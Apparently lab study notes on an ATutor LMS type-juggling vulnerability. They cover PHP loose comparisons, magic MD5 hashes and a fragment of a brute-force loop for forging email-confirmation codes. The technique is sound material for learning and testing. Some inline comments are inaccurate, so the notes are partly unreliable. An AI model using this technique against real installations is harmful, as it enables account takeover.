5. ATutor LMS Type Juggling Vulnerability
sudo cat /etc/postfix/transport # modify postfix configuration
sudo postmap /etc/postfix/transport # start postfix server as root
PHP Loose and Strict Comparisons
```bash
php -a
``` # interactive
var_dump('0xAAAA' == '43690'); # implicit hex string to numerical conversion
var_dump('0xAAAA' == 43690); # implicit hex string to numerical conversion
var_dump(0xAAAA == 43690);
var_dump('0xAAAA' == '43691'); # FALSE
# Exponent vulnerability - any number + 'e' + any number in a string evaluated in a numerical context is evaluated as a number
var_dump('0eAAAA' == '0'); # false
var_dump('0e1111' == '0'); # true
var_dump('0e9999' == 0); # true
Vulnerability Discovery
$code = substr(md5($e . $row['creation_date'] . $id), 0, 10);
if ($code == $m) # loose comparison
$id # unique ID
$e # new email address
$m # loose comparison
$code # partially controllable MD5 hash
Magic Hashes
# certain MD5 and SHA1 hashes conform to exponents in hexadecimal
echo md5('240610708'); # returns '0e462097431906509019562988736854' == '0'
# use script to enumerate valid email addresses
for word in itertools.imap(''.join, itertools.product(string.lowercase, repeat=int(prefix_length)))
# itertools - fast iteration of algorithms
# imap - calls function on the values in the input iterators
# product - joining characters together
# Discovered dlv@offsec.local